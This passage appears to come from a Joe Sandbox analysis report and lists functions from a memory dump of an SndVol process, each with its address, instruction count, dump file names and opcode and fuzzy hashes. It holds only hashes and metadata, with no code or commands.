                                                                                                                                                  • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                                                                                                                  • Instruction ID: 5d2e5fd9faf1f15674b6a52c9b282b9f1bd952f09c57d9463cad9ef49d81fac2
                                                                                                                                                  • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                                                                                                                  • Instruction Fuzzy Hash: DC318B75B00651AFE3128B69CC56F6ABBB9EF817C4F024159FA408B341DA75DC50C7D2
                                                                                                                                                  Function 36667120 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                                                                                                                  • Instruction ID: 30f90590a96e5e496c0a93793ff70e4ebbe5128b382e28a1fcc6087dbb40a74a
                                                                                                                                                  • Opcode Fuzzy Hash: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                                                                                                                  • Instruction Fuzzy Hash: BD4163B5A01704ABE721CF6BCD54E97FBECEF80794F40491EA5A5D7290D630EA00CB51
                                                                                                                                                  Function 366374B0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4b9b1dfa7c263950be797765c934249e16e1d1363ce16f96c031cba83191e19a
                                                                                                                                                  • Instruction ID: 088db2964990ad297c1a40e7fe908f8d825e14b3b5e597848a7ae0198e8e2f51
                                                                                                                                                  • Opcode Fuzzy Hash: 4b9b1dfa7c263950be797765c934249e16e1d1363ce16f96c031cba83191e19a
                                                                                                                                                  • Instruction Fuzzy Hash: E641BEB4A013098FEB08CF2AC484799BFA1BF49394F74C46DD4499B261DB31D942CF89
                                                                                                                                                  Function 3660FF42 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3efd26cd176692bfa2f13fdbbdbafece883815339238a3104b6025f4b408071e
                                                                                                                                                  • Instruction ID: 2facd51c6479c0f113731d5a9d5d1792db366fa3dbcdf3451f1d48a2c5268051
                                                                                                                                                  • Opcode Fuzzy Hash: 3efd26cd176692bfa2f13fdbbdbafece883815339238a3104b6025f4b408071e
                                                                                                                                                  • Instruction Fuzzy Hash: BB418BB1D00608AFDB14CFA6D840BEEBBF9EF88351F50842AE914E7290DB359945CF51
                                                                                                                                                  Function 365B9274 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: dd6e08c14b5d6ff5aa969f86654ca84b46f888d416606c583a51b96e9eb23de9
                                                                                                                                                  • Instruction ID: 0eae75413be639159d1ae9b86df541f42e13a83d4a955af0c5e879f6fcd96fbd
                                                                                                                                                  • Opcode Fuzzy Hash: dd6e08c14b5d6ff5aa969f86654ca84b46f888d416606c583a51b96e9eb23de9
                                                                                                                                                  • Instruction Fuzzy Hash: 44318175A00328AFEF218F29CC40F9A77B5EF86750F5101B9A55CAB280DB309D84CF92
                                                                                                                                                  Function 36595702 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d870bad9d585846534866d69cf38e41b28b15261a494b3d3acb307e7a469a970
                                                                                                                                                  • Instruction ID: 0cf457d7749ffbd03b7cd094824c87c30aa279ec98fd423b89e2fd44d6d608f0
                                                                                                                                                  • Opcode Fuzzy Hash: d870bad9d585846534866d69cf38e41b28b15261a494b3d3acb307e7a469a970
                                                                                                                                                  • Instruction Fuzzy Hash: BA31BC35611B16FBEB458F24CE90A8AFBA6BF84788F509135E90187A50DB70E930CFD1
                                                                                                                                                  Function 365C7F51 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 82cbc5e114577234cad6260a4f56ab7a3f68dc042fb638da007d5a3c1f413f6a
                                                                                                                                                  • Instruction ID: 13e130ae5303ca549e4d398125963519feca52f9ba47d5c706755a592ddae8b2
                                                                                                                                                  • Opcode Fuzzy Hash: 82cbc5e114577234cad6260a4f56ab7a3f68dc042fb638da007d5a3c1f413f6a
                                                                                                                                                  • Instruction Fuzzy Hash: 1C31E171A01621CFE728CFAAC880A2B7BF5EF95794B15847AE445DB350EB30D840CBA0
                                                                                                                                                  Function 3663B2F0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                                                                                  • Instruction ID: e400f9b8b6bc506a1ae8501e7bb531c7e21a842cdea32820896f6a45fd609f38
                                                                                                                                                  • Opcode Fuzzy Hash: b022692fe8b9e9848fdc1893cbbaccaa8075d22d17f181ab9d2aff15b1c15f9d
                                                                                                                                                  • Instruction Fuzzy Hash: 84314975A12721DFE721CF19C880A1ABBF5FFA8394B74856DD4498B660DB31EC41CB81
                                                                                                                                                  Function 36597E96 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                                                                                                                                  • Instruction ID: 4e7c48b86813f37a50a0723a44504da943572232823b19569a8648e3e5566c4b
                                                                                                                                                  • Opcode Fuzzy Hash: 4ccb0177d6147b0c4abe18ecd4a54e6acbfa7287a082c86dabab39786cf3b821
                                                                                                                                                  • Instruction Fuzzy Hash: C9310771A00786BEE705DF74C890BDDFBD4BF82148F58857AC4189B201EB346A59CBE6
                                                                                                                                                  Function 365B50E4 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                  • Instruction ID: 1c8a0d11e5a49f3cce16b380523911ed70fda0a72af279318f9ab88f1254e391
                                                                                                                                                  • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                                                  • Instruction Fuzzy Hash: DF313431B08341DBEB15CE29C800B57B7E9AB84794F88893AF8C48B280D635C845CBE2
                                                                                                                                                  Function 3658B480 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c8c6fa24af6059b735575049015869e3bcdbf51800779ac75c7648fb21413866
                                                                                                                                                  • Instruction ID: 1a913eb9b74ecd1f57e0a191eb1ebbb4dcd9b5c15687a14bd6cb44fae4dc94ac
                                                                                                                                                  • Opcode Fuzzy Hash: c8c6fa24af6059b735575049015869e3bcdbf51800779ac75c7648fb21413866
                                                                                                                                                  • Instruction Fuzzy Hash: B131FF72A00304AFD311DF24C880A5A77BAAF853A4F504679ED649B6A1EB31ED42CFD0
                                                                                                                                                  Function 3658DEA5 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 762cd77aa204e4e29bbc72f9bdb5244d9632cd59504053a6b45bbd3f679adab2
                                                                                                                                                  • Instruction ID: fc24a0064d52c80a4fc2fd09f7337364fc8a6db7969309683d28854bbb2531e4
                                                                                                                                                  • Opcode Fuzzy Hash: 762cd77aa204e4e29bbc72f9bdb5244d9632cd59504053a6b45bbd3f679adab2
                                                                                                                                                  • Instruction Fuzzy Hash: E531B0B2600705AFD325CF25C860A5AB3F6FF94348B908A2DD145CBA51DB71E852CB91
                                                                                                                                                  Function 36589730 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 92211e4ee7de8667e8151b199a0f4e2f1ef14906ec95aa7ccf8e88948e80e517
                                                                                                                                                  • Instruction ID: 38491fb7660a936c1c16f40cfc7c1313abea1a353911e0fe4a33ef29966a4b3e
                                                                                                                                                  • Opcode Fuzzy Hash: 92211e4ee7de8667e8151b199a0f4e2f1ef14906ec95aa7ccf8e88948e80e517
                                                                                                                                                  • Instruction Fuzzy Hash: DD21BE76A00715AFD3228F69C800B5A7BB5FBC5BA4F510479A959EBB40DB34E801CB91
                                                                                                                                                  Function 3658D6AA Relevance: .1, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                                                  • Instruction ID: 612763941948f92897a1042230649c13d2a763584a6672f279c4d05a8fa0c99c
                                                                                                                                                  • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                                                  • Instruction Fuzzy Hash: BE31BF7BB01214AFEB12CE59C880F6A73F9DB84794F658578AD04DB650D670DD40CF91
                                                                                                                                                  Function 365957C0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 99dbc06c42492de645f5e5dfd5a40f73d9b28451948806a3f8fbd497afcc6dd6
                                                                                                                                                  • Instruction ID: 67aff430aba2cf9bc13b9073b1f2ef3821adc1e1fe10850529be859dc1327d49
                                                                                                                                                  • Opcode Fuzzy Hash: 99dbc06c42492de645f5e5dfd5a40f73d9b28451948806a3f8fbd497afcc6dd6
                                                                                                                                                  • Instruction Fuzzy Hash: 3C317C36A25A05FFE7469F64DE50A89BBA6FF84298F545075E8008BB50DB31E831CFC1
                                                                                                                                                  Function 3658DE10 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7184f0ca8a96f3b9faef9f3baf1100657f20dc3a176e3ce727578aa09abe6773
                                                                                                                                                  • Instruction ID: 5ce2a9aeb1f2e826958767018b0bfba20f19155feff59181f1987c9240d91a61
                                                                                                                                                  • Opcode Fuzzy Hash: 7184f0ca8a96f3b9faef9f3baf1100657f20dc3a176e3ce727578aa09abe6773
                                                                                                                                                  • Instruction Fuzzy Hash: 9641A2B1D00358EFDB60CFAAD980AADFBF4BB48340F5041AEE519A7240DB349A85CF55
                                                                                                                                                  Function 365992C5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                  • Instruction ID: bbc5217f844fb108453a0eb5b3b3d475b50178a149e7b9ef520419b768b82b71
                                                                                                                                                  • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                                                                  • Instruction Fuzzy Hash: 7E3168B5608359CFD701CF69D840A8ABBE9EF89354F040969F854DB3A1DB31DC05CBA6
                                                                                                                                                  Function 365E7190 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                  • Instruction ID: d0fe149368b3c4270069fdfaf67fb5cf97e42e1df5e449bce90060285b862127
                                                                                                                                                  • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                                                  • Instruction Fuzzy Hash: 8D317875A04306CFCB04CF59C484986BBF5FF99354B2485A9E9589B315EB30ED06CF91
                                                                                                                                                  Function 36639E56 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f32e46346b055af4ebabe605dcda782a416b391191e80d3790f424cbfc6422d3
                                                                                                                                                  • Instruction ID: 4bdcc1ff40b41f141930d91abba0cd6a75fffd865b22695685aef43070450a6f
                                                                                                                                                  • Opcode Fuzzy Hash: f32e46346b055af4ebabe605dcda782a416b391191e80d3790f424cbfc6422d3
                                                                                                                                                  • Instruction Fuzzy Hash: 5231B2B19057819BD314CF2AC9407167BE5FFC53A4F24C62DE46987290DB70D806CF92
                                                                                                                                                  Function 36593EF4 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                                                                  • Instruction ID: 15700d86e42919739dc9b679908135da7e9c34910e0991506145a8e769a0b725
                                                                                                                                                  • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                                                                                                  • Instruction Fuzzy Hash: 62218176A00614EFD711CF9ACC84E9BBBFAEF95688F514475E5059B210D634ED00CBA0
                                                                                                                                                  Function 36637F3E Relevance: .1, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5280ee8dba79940dac1d45b308bc3f0a5542dfcfa3e51c0d59b920fb7c28fe3
                                                                                                                                                  • Instruction ID: 58ef1f198763e3645ec22d1290f60bee7448a8fd4efb2cfcf8525876ee7eecac
                                                                                                                                                  • Opcode Fuzzy Hash: b5280ee8dba79940dac1d45b308bc3f0a5542dfcfa3e51c0d59b920fb7c28fe3
                                                                                                                                                  • Instruction Fuzzy Hash: 1D31D975E0521A9BDB00CFA9C444ADDFBF5FF88794F24912AD911B3260DB349941CFA4
                                                                                                                                                  Function 36593616 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
